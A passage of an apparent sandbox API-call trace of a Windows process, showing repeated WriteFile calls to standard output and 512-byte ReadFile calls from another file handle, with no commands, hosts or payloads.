(_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.266] GetFileType (hFile=0x50) returned 0x1 [0132.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.266] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] GetFileType (hFile=0x50) returned 0x1 [0132.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.312] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.312] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.313] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] GetFileType (hFile=0x50) returned 0x1 [0132.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.313] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.314] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.314] GetFileType (hFile=0x50) returned 0x1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.315] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.316] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.317] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.318] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.319] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: 